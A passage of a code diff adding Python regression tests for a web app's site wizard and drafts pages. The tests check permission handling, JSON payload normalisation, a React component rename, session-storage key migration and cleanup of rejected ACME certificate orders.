assert "current_user: Optional[Dict[str, Any]] = None" in block or \
"current_user: Optional[dict] = None" in block, (
"R18c-#26 regression: check_user_permission must accept an "
"optional current_user kwarg so callers with the user dict "
"already in hand can skip the is_admin DB roundtrip."
)
assert "current_user.get(\"is_admin\") is True" in block, (
"R18c-#26 regression: check_user_permission no longer "
"short-circuits when current_user is admin."
)
assert "SELECT is_admin FROM users WHERE id" in block, (
"R18c-#26 regression: check_user_permission no longer falls "
"back to a SELECT is_admin lookup for callers that don't "
"provide current_user."
)
# And — crucially — the role-based path must remain so non-admin
# users still get filtered correctly.
assert "get_user_permissions(user_id)" in block, (
"R18c-#26 regression: check_user_permission stopped consulting "
"role permissions for non-admin users."
)
def test_wizard_create_passes_current_user_to_check_user_permission():
"""Every check_user_permission(...) callsite that has a
current_user dict in scope must forward it via the kwarg so we
don't pay an extra is_admin SELECT per check.
Three callsites today: preflight_acme (ssl.read), wizard CREATE
composite for-loop (backend/frontend/ssl create), and wizard
CREATE apply.execute. We assert each contains the kwarg.
"""
src = _read(_REPO / "routers" / "site_wizard.py")
# Find every `await check_user_permission(` occurrence and assert
# the call (which may span multiple lines) includes the kwarg.
import re as _re
pattern = _re.compile(r"await check_user_permission\(([^)]*)\)", _re.DOTALL)
callsites = pattern.findall(src)
assert callsites, (
"R18c-#26 regression: no check_user_permission(...) callsites "
"found at all."
)
missing = [c for c in callsites if "current_user=current_user" not in c]
assert not missing, (
"R18c-#26 regression: some check_user_permission callsites do "
"NOT forward current_user, so each one pays an extra is_admin "
f"SELECT for the admin path. Missing on {len(missing)} callsite(s)."
)
# =====================================================================
# R18c-#27: draft resume jumps to Review & Apply
# =====================================================================
@_skip_no_frontend
def test_wizard_defines_wizard_last_step_constant():
src = _read(_WIZARD_PATH)
assert re.search(r"const\s+WIZARD_LAST_STEP\s*=\s*4\b", src), (
"R18c-#27 regression: WIZARD_LAST_STEP constant missing or "
"no longer set to 4. The constant gates draft-resume → Review "
"step navigation; if a future refactor adds/removes a step, "
"update both the constant and this test."
)
@_skip_no_frontend
def test_wizard_resume_jumps_to_last_step():
src = _read(_WIZARD_PATH)
# The hydrate effect lives below the resumedFromDraft setter call.
# We check the constant is invoked there.
assert "setStep(WIZARD_LAST_STEP)" in src, (
"R18c-#27 regression: hydrate effect no longer calls "
"setStep(WIZARD_LAST_STEP) after applying the draft. Operators "
"are dropped on step 0 again."
)
@_skip_no_frontend
def test_resumed_alert_mentions_previous_navigation():
src = _read(_WIZARD_PATH)
# We include "Previous" guidance in the Alert description so users
# know they can edit earlier steps.
assert "Previous" in src, (
"R18c-#27 UX regression: resumed-from-draft Alert no longer "
"mentions the Previous button. Without that hint operators "
"may not realize they can edit earlier steps."
)
# =====================================================================
# R18c-#28: Drafts Preview button
# =====================================================================
@_skip_no_frontend
def test_drafts_imports_eye_icon():
src = _read(_DRAFTS_PATH)
assert "EyeOutlined" in src, (
"R18c-#28 regression: SiteDrafts.js no longer imports "
"EyeOutlined for the new Preview action."
)
@_skip_no_frontend
def test_drafts_preview_handler_exists():
src = _read(_DRAFTS_PATH)
assert "const handlePreview" in src, (
"R18c-#28 regression: handlePreview function missing"
)
assert "axios.post('/api/sites/preview'" in src, (
"R18c-#28 regression: handlePreview no longer POSTs to "
"/api/sites/preview (post-Phase-B URL rename)"
)
@_skip_no_frontend
def test_drafts_preview_modal_renders_key_sections():
src = _read(_DRAFTS_PATH)
# Assert the modal renders the major sections operators expect.
for label in (
"Cluster & Domains",
"Would Create — Backend",
"Would Create — HTTP Frontend",
"Would Create — HTTPS Frontend",
"Warnings",
):
assert label in src, (
f"R18c-#28 regression: Preview modal no longer renders "
f"the {label!r} section."
)
@_skip_no_frontend
def test_drafts_preview_modal_state_cleanup():
"""When the modal closes we must clear preview state to avoid
showing stale data on the next open."""
src = _read(_DRAFTS_PATH)
assert "handleClosePreview" in src, (
"R18c-#28 regression: handleClosePreview missing"
)
# Each setter should be called from handleClosePreview.
close_idx = src.find("const handleClosePreview")
assert close_idx != -1
block = src[close_idx:close_idx + 800]
for setter in (
"setPreviewModalOpen(false)",
"setPreviewData(null)",
"setPreviewError(null)",
):
assert setter in block, (
f"R18c-#28 stale-data regression: handleClosePreview no "
f"longer calls {setter}"
)
# =====================================================================
# R18c-#29: Drafts SSL/TLS column + ssl_cert_summary
# =====================================================================
def test_list_drafts_response_includes_ssl_cert_summary_field():
src = _read(_REPO / "routers" / "site_wizard.py")
# Find the list_drafts function
idx = src.find("async def list_drafts(")
assert idx != -1, "list_drafts not found"
# Read until next async def
next_idx = src.find("\nasync def ", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 6000]
assert '"ssl_cert_summary": ssl_cert_summary' in block, (
"R18c-#29 regression: list_drafts response no longer carries "
"ssl_cert_summary; the drafts UI cannot show real cert info."
)
def test_list_drafts_uses_batch_cert_lookup():
"""ssl_cert_summary lookup must be ONE batch SELECT (ANY array),
not N+1 SELECT-per-draft."""
src = _read(_REPO / "routers" / "site_wizard.py")
idx = src.find("async def list_drafts(")
assert idx != -1
next_idx = src.find("\nasync def ", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 6000]
assert "ANY($1::int[])" in block, (
"R18c-#29 perf regression: list_drafts cert lookup is no "
"longer a single ANY array query — N+1 SELECTs likely."
)
assert "ssl_certificates" in block, (
"R18c-#29 regression: list_drafts no longer joins ssl_certificates"
)
def test_list_drafts_marks_deleted_certs():
src = _read(_REPO / "routers" / "site_wizard.py")
idx = src.find("async def list_drafts(")
assert idx != -1
next_idx = src.find("\nasync def ", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 6000]
assert '"deleted": True' in block, (
"R18c-#29 regression: list_drafts no longer surfaces deleted "
"cert references via ssl_cert_summary['deleted']=True. The UI "
"would silently fall back to 'no cert' instead of warning."
)
def test_list_drafts_only_looks_up_existing_mode():
"""We must NOT look up certs for upload/acme/none modes."""
src = _read(_REPO / "routers" / "site_wizard.py")
idx = src.find("async def list_drafts(")
next_idx = src.find("\nasync def ", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 6000]
assert 'ssl_obj.get("mode") == "existing"' in block, (
"R18c-#29 regression: cert lookup no longer gated on "
"ssl.mode=='existing'; we'd issue useless SELECTs for "
"upload/acme drafts."
)
@_skip_no_frontend
def test_drafts_renames_expires_to_draft_expires():
src = _read(_DRAFTS_PATH)
assert "title: 'Draft Expires'" in src, (
"R18c-#29 UX regression: 'Expires' column was not renamed to "
"'Draft Expires'; operators will keep mistaking the draft TTL "
"for the SSL cert expiry."
)
@_skip_no_frontend
def test_drafts_has_ssl_tls_column():
src = _read(_DRAFTS_PATH)
assert "title: 'SSL/TLS'" in src, (
"R18c-#29 regression: SSL/TLS column missing from drafts table"
)
assert "renderSslColumn" in src, (
"R18c-#29 regression: renderSslColumn helper removed"
)
@_skip_no_frontend
def test_drafts_imports_getSSLExpiryInfo():
"""Reuse the same helper FrontendManagement uses so the visual
language stays consistent (Tag color, Progress bar, status label)."""
src = _read(_DRAFTS_PATH)
assert "getSSLExpiryInfo" in src, (
"R18c-#29 regression: drafts no longer reuses "
"getSSLExpiryInfo — visual language drifted from "
"FrontendManagement's SSL/TLS column."
)
@_skip_no_frontend
def test_drafts_handles_deleted_cert_state():
src = _read(_DRAFTS_PATH)
assert "summary.deleted" in src, (
"R18c-#29 regression: drafts UI no longer renders the "
"'Cert deleted' state when ssl_cert_summary.deleted=True."
)
assert "Cert deleted" in src, (
"R18c-#29 regression: 'Cert deleted' label missing"
)
@@ -0,0 +1,215 @@
"""v1.5.0 R18c round 8 audit fixes — JSONB → API serialization contract.
Bulgu A (KRITIK regression — observed in production):
asyncpg has no JSONB codec registered on our connection pool, so
every column declared as JSONB in PostgreSQL comes back to Python as
a raw JSON string, not a parsed dict. Several router endpoints were
forwarding this raw string verbatim into their JSON response, which
meant the React renderer received `payload` (or `details`) as a
string and ended up trying to access `.domains` / `.cluster_id` on
a plain string — silently undefined.
Concrete failure observed in screenshot:
* Site Drafts page shows empty Domains and "—" Cluster columns
and "No SSL" SSL/TLS even when the user actually saved a fully
populated draft.
* Resume from a draft does NOT hydrate the wizard form: backend
returned a JSON string, the drafts page then JSON.stringify'd
it (re-quoting), the wizard JSON.parse'd it back to a plain
string, the `typeof parsed === 'object'` guard failed, hydrate
bailed.
Fix:
* Backend: list_drafts.payload is now ALWAYS a dict (parsed via
json.loads when asyncpg hands us a string).
* Backend: acme_diagnostics event_log .details is normalized to
a dict (JSONB columns) instead of forwarding the raw string.
* Frontend: SiteDrafts normalizes payload on ingest via
a single normalizePayload helper; handleResume / handlePreview
use that helper too.
* Frontend: SiteWizard hydrate effect defensively re-parses
up to 3 times if it receives a stringified-JSON-as-string (so a
pre-fix sessionStorage entry from an old tab still hydrates).
Why this slipped past R12-R18c rounds 1-7:
* Pre-existing live deployments may have had a JSONB codec set up
via a different code path that our new routers didn't pick up,
OR the shape was tolerated because the column renders were
accidentally null-safe (Array.isArray returned false → empty
array → no crash, but ALSO no data shown). The defect was
cosmetically silent until a user actually compared what they
typed to what the table rendered.
"""
import json
import re
from pathlib import Path
import pytest
_REPO = Path(__file__).resolve().parent.parent
_FRONT = _REPO.parent / "frontend" / "src"
_DRAFTS_PATH = _FRONT / "components" / "SiteDrafts.js"
_WIZARD_PATH = _FRONT / "components" / "SiteWizard.js"
_FRONTEND_AVAILABLE = _DRAFTS_PATH.exists() and _WIZARD_PATH.exists()
def _read(p: Path) -> str:
return p.read_text()
_skip_no_frontend = pytest.mark.skipif(
not _FRONTEND_AVAILABLE,
reason="frontend/src not present (backend-only test container) — "
"JS source-level assertions skipped",
)
# =====================================================================
# Backend: list_drafts payload contract
# =====================================================================
def test_list_drafts_payload_is_normalized_to_dict():
"""The response builder must coerce r['payload'] to a dict before
handing it to FastAPI. Otherwise asyncpg's raw JSONB string leaks
into the API contract and the FE can't access nested fields."""
src = _read(_REPO / "routers" / "site_wizard.py")
# Find the list_drafts function body.
idx = src.find("async def list_drafts(")
assert idx != -1, "list_drafts not found"
next_idx = src.find("\nasync def ", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 6000]
# The payload field in the response dict must use the parsed dict
# (the function-local variable `p` populated by `_payload(r)`),
# NOT the raw asyncpg row value.
assert '"payload": p if isinstance(p, dict) else {}' in block, (
"R18c-#30 (Bulgu A) regression: list_drafts is forwarding the "
"raw r['payload'] (a JSON string when asyncpg has no JSONB "
"codec) instead of the parsed dict. Frontend cannot read "
"`payload.domains` or `payload.cluster_id` from a string."
)
# Also verify the helper that does the parse exists and handles the
# str-vs-dict cases defensively.
assert "if isinstance(p, str):" in block and "json.loads(p)" in block, (
"R18c-#30 regression: _payload() helper no longer parses str "
"JSON payloads."
)
# =====================================================================
# Backend: acme_diagnostics event_log details contract
# =====================================================================
def test_acme_event_log_details_is_normalized_to_dict():
src = _read(_REPO / "routers" / "acme_diagnostics.py")
# Look for the new defensive parse in the acme_order_event branch.
assert "isinstance(_det, str)" in src and "json.loads(_det)" in src, (
"R18c-#30 regression: acme_diagnostics event_log no longer "
"parses asyncpg's raw JSONB string for the `details` field. "
"Frontend ends up trying to access dict keys on a plain string."
)
# =====================================================================
# Frontend: SiteDrafts normalizePayload helper
# =====================================================================
@_skip_no_frontend
def test_drafts_defines_normalizePayload_helper():
src = _read(_DRAFTS_PATH)
assert "const normalizePayload" in src, (
"R18c-#30 regression: SiteDrafts.js no longer exposes "
"a normalizePayload helper — the FE has no last-line-of-defense "
"if the backend ever regresses to returning str payloads."
)
assert "JSON.parse(p)" in src, (
"R18c-#30 regression: normalizePayload no longer attempts to "
"JSON.parse a string payload."
)
@_skip_no_frontend
def test_drafts_normalizes_payload_on_ingest():
"""Drafts must be normalized once on fetch so every render and the
Resume / Preview handlers see a dict."""
src = _read(_DRAFTS_PATH)
assert "raw.map(normalizeDraft)" in src, (
"R18c-#30 regression: drafts list no longer normalizes payloads "
"via map(normalizeDraft) on ingest."
)
@_skip_no_frontend
def test_drafts_resume_uses_normalized_payload():
"""handleResume must stringify a NORMALIZED dict, not the raw
server response, so the wizard's hydrate effect always lands on
a dict after JSON.parse."""
src = _read(_DRAFTS_PATH)
idx = src.find("const handleResume")
assert idx != -1
next_idx = src.find("const handle", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 1000]
assert "normalizePayload(draft" in block, (
"R18c-#30 regression: handleResume no longer normalizes the "
"payload before stuffing it into sessionStorage. A pre-fix "
"string would be JSON.stringify-quoted and never hydrated."
)
@_skip_no_frontend
def test_drafts_preview_uses_normalized_payload():
src = _read(_DRAFTS_PATH)
idx = src.find("const handlePreview")
assert idx != -1
next_idx = src.find("const handle", idx + 1)
block = src[idx:next_idx if next_idx != -1 else idx + 1500]
assert "normalizePayload(draft" in block, (
"R18c-#30 regression: handlePreview no longer normalizes the "
"payload before POSTing to /preview."
)
# =====================================================================
# Frontend: SiteWizard defensive parse on hydrate
# =====================================================================
@_skip_no_frontend
def test_wizard_hydrate_handles_doubly_encoded_payload():
"""Belt-and-suspenders guard for any pre-fix sessionStorage entry
that was double-encoded by the old drafts page."""
src = _read(_WIZARD_PATH)
# The hydrate effect should attempt to re-parse if the result of
# JSON.parse(raw) is still a string (i.e. the raw was a quoted
# string of a JSON string).
assert "while (typeof parsed === 'string'" in src, (
"R18c-#30 regression: wizard hydrate effect no longer guards "
"against double-encoded payloads. A user who has an old draft "
"page open in another tab would still get an empty wizard."
)
# Final check guards against the result still not being a usable
# dict (must be `object && !Array.isArray`).
assert "!Array.isArray(parsed)" in src, (
"R18c-#30 regression: wizard hydrate no longer rejects array-"
"shaped parsed values; an array would silently bypass the "
"object guard and break setFieldsValue."
)
# =====================================================================
# Sanity: round 8 didn't break round 7 wiring
# =====================================================================
@_skip_no_frontend
def test_round8_preserves_round7_setStep_to_review():
src = _read(_WIZARD_PATH)
assert "setStep(WIZARD_LAST_STEP)" in src, (
"R18c-#27 regression after round 8: hydrate effect no longer "
"jumps to Review & Apply on resume."
)
@@ -0,0 +1,247 @@
"""
R18c round 9 — Component file rename: ProxiedHost{Wizard,Drafts}.js → Site{Wizard,Drafts}.js
=============================================================================================
UI rebrand under v1.5.0 swung "Proxied Host" → "Site" for every label
(menu entry, page title, button) but the React component file names
were left as ProxiedHostWizard.js / ProxiedHostDrafts.js. R18c-#31
finishes the cleanup by also renaming the source files and the
exported component identifiers.
Goals locked in by this test file:
Bulgu 1 — old file paths are gone (no stragglers in repo).
Bulgu 2 — new file paths exist and export Site{Wizard,Drafts}.
Bulgu 3 — App.js imports + route element references use the new names.
Bulgu 4 — sessionStorage key migration: writers fire BOTH the new
(`site_wizard_draft`) and the legacy
(`proxied_host_wizard_draft`) keys for one release window;
the wizard reads BOTH on mount and clears BOTH after a
successful hydrate.
Bulgu 5 — backend activity log message no longer says "proxied host"
(UI consistency: history entries created post-rename read
"Wizard-created site '...'" so the activity log matches the
rebranded menu / page titles operators see in the UI).
This file is mostly static-source assertions (no FastAPI app boot
needed) so it runs cleanly in the backend-only Docker test image.
Frontend-source assertions are guarded with skipif when frontend/src
is missing (consistent with prior rounds).
"""
from __future__ import annotations
from pathlib import Path
import pytest
# R18c round 9 fix: in the backend-only Docker test image the source
# is mounted at /app (not /repo/backend), so `parents[2]` resolves to
# `/` and the test trips on a non-existent /backend/... path. Mirror
# the round-8 layout instead — _BACK is the directory that contains
# `routers/`, `models/`, `tests/` (regardless of whether that's
# `<repo>/backend/` or `/app/`), and the frontend tree is reached
# from its parent (which only exists in dev / full checkouts).
_BACK = Path(__file__).resolve().parent.parent
_FRONT = _BACK.parent / "frontend" / "src"
_FRONTEND_AVAILABLE = _FRONT.exists()
_WIZARD_NEW = _FRONT / "components" / "SiteWizard.js"
_DRAFTS_NEW = _FRONT / "components" / "SiteDrafts.js"
_WIZARD_OLD = _FRONT / "components" / "ProxiedHostWizard.js"
_DRAFTS_OLD = _FRONT / "components" / "ProxiedHostDrafts.js"
_APP = _FRONT / "App.js"
# ---------------------------------------------------------------------
# Bulgu 1 — old file paths are GONE
# ---------------------------------------------------------------------
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_old_proxied_host_wizard_path_removed():
"""ProxiedHostWizard.js must no longer exist; the import path
everywhere now resolves to SiteWizard.js."""
assert not _WIZARD_OLD.exists(), (
f"R18c-#31 regression: legacy {_WIZARD_OLD.name} still exists. "
"Rename to SiteWizard.js (git mv to preserve blame) and update "
"App.js + every backend test that statically pins the path."
)
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_old_proxied_host_drafts_path_removed():
assert not _DRAFTS_OLD.exists(), (
f"R18c-#31 regression: legacy {_DRAFTS_OLD.name} still exists. "
"Rename to SiteDrafts.js and update App.js + backend tests."
)
# ---------------------------------------------------------------------
# Bulgu 2 — new file paths exist and export Site{Wizard,Drafts}
# ---------------------------------------------------------------------
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_wizard_exists_and_exports_site_wizard():
assert _WIZARD_NEW.exists(), "SiteWizard.js must exist after the rename"
src = _WIZARD_NEW.read_text()
assert "const SiteWizard = (" in src, (
"SiteWizard.js must declare the component as `const SiteWizard ="
)
assert "export default SiteWizard;" in src, (
"SiteWizard.js must default-export `SiteWizard`. The old "
"`ProxiedHostWizard` identifier is gone and any legacy "
"import will surface as a build error."
)
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_site_drafts_exists_and_exports_site_drafts():
assert _DRAFTS_NEW.exists(), "SiteDrafts.js must exist after the rename"
src = _DRAFTS_NEW.read_text()
assert "const SiteDrafts = (" in src, (
"SiteDrafts.js must declare the component as `const SiteDrafts ="
)
assert "export default SiteDrafts;" in src, (
"SiteDrafts.js must default-export `SiteDrafts`."
)
# ---------------------------------------------------------------------
# Bulgu 3 — App.js wires the new names everywhere
# ---------------------------------------------------------------------
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_app_imports_use_new_names():
src = _APP.read_text()
assert "import SiteWizard from './components/SiteWizard';" in src, (
"App.js must import SiteWizard from './components/SiteWizard'"
)
assert "import SiteDrafts from './components/SiteDrafts';" in src, (
"App.js must import SiteDrafts from './components/SiteDrafts'"
)
# And the old names must be GONE from App.js (no half-rename).
assert "ProxiedHostWizard" not in src, (
"App.js must not reference ProxiedHostWizard anymore (rename incomplete)"
)
assert "ProxiedHostDrafts" not in src, (
"App.js must not reference ProxiedHostDrafts anymore (rename incomplete)"
)
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_app_routes_wire_new_components():
"""All three route layers (canonical /sites/*, R17 /quick-setup/*,
v1.5.0 /proxied-hosts/*) must point to <SiteWizard /> / <SiteDrafts />
so legacy bookmarked URLs keep working without resurrecting the old
component identifiers."""
src = _APP.read_text()
expected_pairs = [
('path="/sites/new"', "<SiteWizard />"),
('path="/sites/drafts"', "<SiteDrafts />"),
('path="/quick-setup"', "<SiteWizard />"),
('path="/quick-setup/drafts"', "<SiteDrafts />"),
('path="/proxied-hosts/new"', "<SiteWizard />"),
('path="/proxied-hosts/drafts"', "<SiteDrafts />"),
]
for path_marker, element_marker in expected_pairs:
# Find the line containing the path and verify the same line
# binds the element. Loose substring check is enough — the
# File is small and the route lines are single-line.
lines = [ln for ln in src.splitlines() if path_marker in ln]
assert lines, f"App.js missing route: {path_marker}"
assert any(element_marker in ln for ln in lines), (
f"R18c-#31 regression: {path_marker} not wired to {element_marker}"
)
# ---------------------------------------------------------------------
# Bulgu 4 — sessionStorage key migration (writer + reader)
# ---------------------------------------------------------------------
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_drafts_writes_both_session_keys_for_resume():
"""SiteDrafts.handleResume must write the payload to BOTH the new
`site_wizard_draft` key and the legacy `proxied_host_wizard_draft`
key. This bridges the rename for one release window: a tab still
running pre-rename SiteWizard JS keeps reading from the legacy key
while the post-rename SiteWizard prefers the new one."""
src = _DRAFTS_NEW.read_text()
assert "const WIZARD_DRAFT_SESSION_KEY = 'site_wizard_draft';" in src, (
"SiteDrafts must define the new sessionStorage key constant "
"as `site_wizard_draft`"
)
assert (
"const LEGACY_WIZARD_DRAFT_SESSION_KEY = 'proxied_host_wizard_draft';"
in src
), (
"SiteDrafts must define the legacy sessionStorage key constant "
"as `proxied_host_wizard_draft`"
)
# Inside handleResume both setItem calls must reference the
# constants — not bare strings (so the rename is the only place
# to ever touch the key value).
assert "sessionStorage.setItem(WIZARD_DRAFT_SESSION_KEY, serialized)" in src, (
"handleResume must write the new session key"
)
assert (
"sessionStorage.setItem(LEGACY_WIZARD_DRAFT_SESSION_KEY, serialized)"
in src
), "handleResume must also write the legacy session key during the migration window"
@pytest.mark.skipif(not _FRONTEND_AVAILABLE, reason="frontend/src not present")
def test_wizard_reads_both_session_keys_and_clears_both():
"""SiteWizard's hydrate effect must read from BOTH keys (new
preferred, legacy fallback) and remove BOTH after consuming so a
stale draft does not silently rehydrate on a later remount of the
wizard component."""
src = _WIZARD_NEW.read_text()
assert "const WIZARD_DRAFT_SESSION_KEY = 'site_wizard_draft';" in src
assert (
"const LEGACY_WIZARD_DRAFT_SESSION_KEY = 'proxied_host_wizard_draft';"
in src
)
# Read fallback chain
assert (
"sessionStorage.getItem(WIZARD_DRAFT_SESSION_KEY) ||" in src
and "sessionStorage.getItem(LEGACY_WIZARD_DRAFT_SESSION_KEY)" in src
), (
"SiteWizard must prefer the new key but fall back to the legacy "
"one on hydrate"
)
# Clear both after consuming.
assert "sessionStorage.removeItem(WIZARD_DRAFT_SESSION_KEY);" in src
assert "sessionStorage.removeItem(LEGACY_WIZARD_DRAFT_SESSION_KEY);" in src
# ---------------------------------------------------------------------
# Bulgu 5 — backend activity log message uses "site"
# ---------------------------------------------------------------------
def test_wizard_activity_log_says_site_not_proxied_host():
"""The wizard's create_from_wizard handler writes a config_versions
description that surfaces in the activity log / version history UI.
Pre-rename it read 'Wizard-created proxied host ...' which created
a copy mismatch with every other UI surface ('New Site (Wizard)',
'Site Drafts', etc). Post-rename: 'Wizard-created site ...'. We
keep the assertion simple — substring check on the router source —
so a future refactor that re-introduces 'proxied host' in the log
flag fails fast.
NOTE: existing rows in config_versions.description are NOT
rewritten; this is forward-only consistency for newly created
versions."""
router_path = _BACK / "routers" / "site_wizard.py"
assert router_path.exists(), (
f"backend/routers/site_wizard.py missing under {_BACK}; the "
"test path layout assumption is wrong (see _BACK definition)."
)
src = router_path.read_text()
assert "f\"Wizard-created site '" in src, (
"R18c-#31 regression: wizard activity log message must say "
"'Wizard-created site' to match the post-rebrand UI"
)
assert "Wizard-created proxied host" not in src, (
"Stale 'Wizard-created proxied host' message must be removed"
)
+152
View File
@@ -0,0 +1,152 @@
"""
v1.5.0 Feature B — reject path safety (CRITICAL — M4/L11).
When a wizard-created config_version is rejected, ALL of the wizard's
entities (frontend + backend + servers + ssl_certificate +
letsencrypt_order) must be cleanly removed so the user can retry without
orphan rows.
These tests target three critical gates:
1. utils/entity_snapshot._rollback_create handles the new
`letsencrypt_order` entity type (drops the staged ACME order, cascading
acme_challenges).
2. routers/cluster.py treats `bulk-proxied-host-create-*` as a
`is_bulk_style_version` so the existing bulk-rejection cleanup applies
to wizard versions.
3. The same rejection path collects letsencrypt_order entity ids into the
bulk_import_entity_ids dict so the force-delete sweep removes them.
"""
from unittest.mock import AsyncMock
import pytest
from utils.entity_snapshot import _rollback_create
# ----------------------------------------------------------------------------
# 1. _rollback_create handles letsencrypt_order
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_rollback_create_drops_letsencrypt_order():
conn = AsyncMock()
ok = await _rollback_create(conn, "letsencrypt_order", entity_id=42)
assert ok is True
sql, *args = conn.execute.call_args.args
assert "DELETE FROM letsencrypt_orders" in sql
assert args[0] == 42
@pytest.mark.asyncio
async def test_rollback_create_letsencrypt_order_swallows_db_error():
"""If the DELETE fails, return False (not raise)."""
conn = AsyncMock()
conn.execute.side_effect = Exception("FK violation")
ok = await _rollback_create(conn, "letsencrypt_order", entity_id=1)
assert ok is False
@pytest.mark.asyncio
async def test_rollback_create_unknown_entity_type_returns_false():
conn = AsyncMock()
ok = await _rollback_create(conn, "made_up_thing", entity_id=1)
assert ok is False
conn.execute.assert_not_awaited()
# ----------------------------------------------------------------------------
# 2. cluster.py is_bulk_style_version recognises wizard prefix
# ----------------------------------------------------------------------------
def _is_bulk_style_version(version_name: str) -> bool:
"""Mirror of the predicate inside routers/cluster.py:apply_pending_changes.
Pulled into a helper here so we can verify the recognised prefixes
without standing up the full FastAPI app.
"""
return (
version_name.startswith("bulk-import-")
or version_name.startswith("restore-")
or version_name.startswith("bulk-site-create-")
or version_name.startswith("bulk-proxied-host-create-")
)
def test_is_bulk_style_version_recognises_wizard_prefix():
assert _is_bulk_style_version("bulk-site-create-1715195200") is True
# Phase D backward-compat: the legacy `bulk-proxied-host-create-`
# prefix must keep matching so historical APPLIED versions still
# reject cleanly after the rename.
assert _is_bulk_style_version("bulk-proxied-host-create-1715195200") is True
def test_is_bulk_style_version_recognises_existing_prefixes():
assert _is_bulk_style_version("bulk-import-12345") is True
assert _is_bulk_style_version("restore-snapshot-99") is True
def test_is_bulk_style_version_rejects_arbitrary_names():
assert _is_bulk_style_version("manual-edit-1") is False
assert _is_bulk_style_version("ad-hoc-change") is False
assert _is_bulk_style_version("user-edit-12345") is False
def test_is_bulk_style_version_actual_predicate_in_cluster_router():
"""Sanity-check that the cluster.py source file truly contains the
wizard-version prefixes in BOTH locations:
- the snapshot collection branch
- the has_bulk_versions detection branch
Both the current `bulk-site-create-` prefix AND the legacy
`bulk-proxied-host-create-` prefix must be wired into both
branches so reject cleanup works for current AND historical
APPLIED versions.
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "cluster.py"
text = src.read_text()
# Current naming.
site_occurrences = text.count("'bulk-site-create-'")
assert site_occurrences >= 2, (
f"Expected >= 2 'bulk-site-create-' occurrences in cluster.py, "
f"found {site_occurrences}. The reject path only works when BOTH "
f"branches recognise the wizard prefix (snapshot collect + "
f"has_bulk_versions)."
)
# Legacy naming (Phase D backward-compat).
legacy_occurrences = text.count("'bulk-proxied-host-create-'")
assert legacy_occurrences >= 2, (
f"Expected >= 2 'bulk-proxied-host-create-' (legacy) occurrences "
f"in cluster.py, found {legacy_occurrences}. After the Phase D "
f"rename the legacy prefix MUST still be wired into both "
f"branches so historical APPLIED versions can still be "
f"rejected/cleaned up."
)
def test_letsencrypt_order_force_delete_branch_exists_in_cluster_router():
"""Sanity-check that the force-delete cleanup explicitly handles
letsencrypt_orders (the wizard's staged ACME order).
"""
from pathlib import Path
src = Path(__file__).resolve().parent.parent / "routers" / "cluster.py"
text = src.read_text()
assert "letsencrypt_orders" in text
# The cluster router must include a DELETE for letsencrypt_orders in the
# bulk-rejection force-delete sweep — otherwise the wizard's staged
# ACME order would orphan when the bulk version is rejected.
assert "DELETE FROM letsencrypt_orders" in text
def test_entity_snapshot_branch_for_letsencrypt_order_exists():
"""Sanity check that entity_snapshot.py truly has the letsencrypt_order
branch (not just we hand-wrote the helper test above)."""
from pathlib import Path
src = (Path(__file__).resolve().parent.parent
/ "utils" / "entity_snapshot.py")
text = src.read_text()
assert 'entity_type == "letsencrypt_order"' in text
@@ -0,0 +1,83 @@
"""v1.5.0 R13 — Bulgu #v9: resume must deep-merge draft into initialValues.
Before R13, SiteWizard.js used a flat spread
form.setFieldsValue({ ...initialValues, ...parsed })
when hydrating from a saved draft. JS spread is shallow: any top-level
key in `parsed` (e.g. `parsed.ssl = {mode: 'acme', auto_renew: true}`)
WHOLLY replaced the initialValues group object — wiping the new R12
advanced defaults (ssl_alpn, ssl_min_ver, hsts_*, backend timeouts,
etc.). The user resumed an older draft and silently lost the modern
defaults.
The fix introduces a per-group _mergeGroup helper and merges
backend/frontend/ssl shallowly so missing nested keys fall back to
initialValues. servers stays as a wholesale array replacement (or
initialValues fallback when the list is empty/missing).
These are static source-level assertions on the React component.
"""
from pathlib import Path
import pytest
_WIZARD_PATH = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteWizard.js"
)
if not _WIZARD_PATH.exists():
pytest.skip(
f"frontend not present at {_WIZARD_PATH}; running in backend-only "
"container is expected — skip wizard JS source assertions",
allow_module_level=True,
)
WIZARD_JS = _WIZARD_PATH.read_text()
def test_merge_group_helper_present():
"""The fix must expose a _mergeGroup helper and use it in resume."""
assert "_mergeGroup" in WIZARD_JS, (
"Bulgu #v9 regression: SiteWizard.js must define a "
"_mergeGroup helper so resume hydrates each top-level group "
"(backend/frontend/ssl) as a SHALLOW merge instead of a "
"wholesale replace."
)
def test_resume_merges_backend_frontend_ssl_groups():
"""Each of backend / frontend / ssl must go through _mergeGroup."""
for group in ("backend", "frontend", "ssl"):
assert f"{group}: _mergeGroup(initialValues.{group}, parsed.{group})" in WIZARD_JS, (
f"Bulgu #v9 regression: {group!r} group is no longer merged "
"via _mergeGroup. A flat spread would let an old draft wipe "
"the modern R12 defaults that the wizard pre-populates."
)
def test_servers_array_uses_safe_fallback():
"""servers is an array (not a dict) — the fix must keep the parsed
list when non-empty, fall back to initialValues otherwise."""
assert "Array.isArray(parsed.servers) && parsed.servers.length" in WIZARD_JS, (
"Bulgu #v9 regression: servers must fall back to initialValues "
"when the saved draft has an empty/missing list, otherwise the "
"wizard renders 0 server rows after resume."
)
def test_old_flat_spread_pattern_removed():
"""The old `{...initialValues, ...parsed}` pattern must be gone (or
only appear inside a clearly-different context). Lock down by
asserting the literal sequence used in the previous implementation
no longer appears as the entire setFieldsValue argument."""
